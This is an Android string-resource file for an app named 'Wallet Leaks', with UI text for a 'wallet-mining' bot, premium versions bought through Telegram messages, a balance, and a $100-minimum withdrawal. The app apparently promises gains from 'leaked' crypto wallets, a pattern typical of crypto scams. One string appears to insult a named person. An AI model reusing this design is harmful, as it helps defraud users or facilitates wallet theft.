<resources>
    <string name="app_name">Wallet Leaks</string>
    <string name="made_by_the_uss">by\n The USS</string>
    <string name="hello_blank_fragment">Hello blank fragment</string>
    <string name="home">Home</string>
    <string name="coin_list">Coin list</string>
    <string name="coins">Coins</string>
    <string name="settings">Settings</string>
    <string name="profile">Profile</string>
    <string name="title_wallet_premium_dialog">Go beyond the limits of base version, extend \nexisting features and support our product in order \nprovide it with the opportunity to grow.</string>
    <string name="wallet_leaks_premium">Wallet Leaks Premium</string>
    <string name="soon">Soon</string>
    <string name="select_multi_crypto_coin">Select 3 coins to mine simultaneously.</string>
    <string name="restart_crypto_bot">Restart the bot after 12 hours instead of 24.</string>
    <string name="Increased_bot_5_to_10_hours">Increased bot operation time from 5 to 10 hours</string>
    <string name="btn_text_buy_premium">BUY FOR 39,90$ AND KEEP IT FOREVER</string>
    <string name="premium_price">39,90$</string>
    <string name="telegram_not_installed">На устройстве не установлен Telegram</string>
    <string name="telegram_account">walletcryptoleaks</string>
    <string name="enter_key">Enter key…</string>
    <string name="start">start</string>
    <string name="stop">stop</string>
    <string name="save_coins">Save</string>
    <string name="enter_the_cryptocurrency_in_the_settings">Enter the cryptocurrency in the settings</string>
    <string name="username">Username</string>
    <string name="amir_gay">WalletLeaks-Amir Gay</string>
    <string name="add_a_crypto_wallet">Add a crypto wallet…</string>
    <string name="wellcome">Wellcome</string>
    <string name="register_to_continue">Register to continue</string>
    <string name="name">Name</string>
    <string name="password">Password</string>
    <string name="confirm_password">Confirm password</string>
    <string name="create_an_account">Create an account</string>
    <string name="oops">OOPS!</string>
    <string name="constant_base_version_price">$39.99</string>
    <string name="premium_account_discount"><strike>$80</strike> / $59.90</string>
    <string name="buy_premium_now_to_save_25_off_the_initial_price_and_get_the_perks_below">Buy premium now to save 25% off the initial price and get the perks below.</string>
    <string name="recommendation_for_you">Recommendation for you</string>
    <string name="you_did_not_buy_the_app_select_the_version_that_suits_you_the_best">You did not buy the app, select the version that suits you the best.</string>
    <string name="i_want_to_buy_base_version">Добрый день! Я бы хотел приобрести базовую версию Wallet Leaks.</string>
    <string name="base_version_label">Base version</string>
    <string name="i_want_to_buy_premium_version">Добрый день! Я бы хотел приобрести премиум версию Wallet Leaks.</string>
    <string name="premium_version_label">Premium version</string>
    <string name="telegram_is_not_installed">Telegram is not installed.</string>
    <string name="just_paste_the_text_from_your_clipboard">Just paste the text from your clipboard.</string>
    <string name="log_in">Log in</string>
    <string name="sign_up">Sign Up</string>
    <string name="faq">FAQ</string>
    <string name="don_t_have_an_account">Don’t have an account?</string>
    <string name="telegram_wallet_leaks_link">https://t.me/walletcryptoleaks</string>
    <string name="telegram_faq_channel_link">https://t.me/walletleaksfaq</string>
    <string name="submit">Submit</string>
    <string name="withdrawal">Withdrawal</string>
    <string name="withdrawal_confirmation">Withdrawal Confirmation</string>
    <string name="you_will_get">You will get</string>
    <string name="usd">USD</string>
    <string name="withdraw_to">Withdraw to</string>
    <string name="withdrawal_amount">Withdrawal amount</string>
    <string name="founds_will_be_available">Founds will be available</string>
    <string name="within_30_minutes">Within 30 minutes</string>
    <string name="change">Change</string>
    <string name="confirm">Confirm</string>
    <string name="log_out">Log out</string>
    <string name="withdrawal_amount_in_usd">%1$s USD</string>
    <string name="money_with_dollar_sign">%1$s$</string>
    <string name="cryptoAddress">crypto_address</string>
    <string name="money_with_dollar_sign_reversed">$%1$s</string>
    <string name="user_id_multiplied">ID: %1$s</string>
    <string name="coming_soon">Coming soon…</string>
    <string name="minimum_transaction">The minimum transaction is at least $100!</string>
    <string name="cryptocurrency_amount_is_more_than_you_own">"The cryptocurrency amount you want to \n withdraw is more than you currently own."</string>
    <string name="copy_address_clipboard">The address is copied to the clipboard.</string>
    <string name="oops_you_have_already">Oops, you have already wallet-mined.\nTry in %1$s</string>
    <string name="unable_to_load_coins">Unable to load coins.</string>
    <string name="unable_to_refresh_coins">Unable to refresh coins.</string>
    <string name="cant_select_coins_due_to_lost_internet_connection">Unable to select coins due to lost connection.</string>
    <string name="cant_load_user_balance">Can\'t load your balance and thus withdraw.</string>
    <string name="cant_load_your_profile_info">Can\'t load your profile info.</string>
    <string name="wallet_mining_requires_stable_internet_connection">Wallet-mining requires stable internet connection. Looks like you don\'t have one.</string>
    <string name="in_order_to_withdraw_we_need_internet_connection">In order to withdraw, we need internet connection.</string>
    <string name="wrong_authentication_credentials">Your password is incorrect. Double-check your password.</string>
    <string name="internal_server_error">Oops, our server is out of order. Wait and try again.</string>
    <string name="this_username_isnt_available">This username isn\'t available. Please try another.</string>
</resources>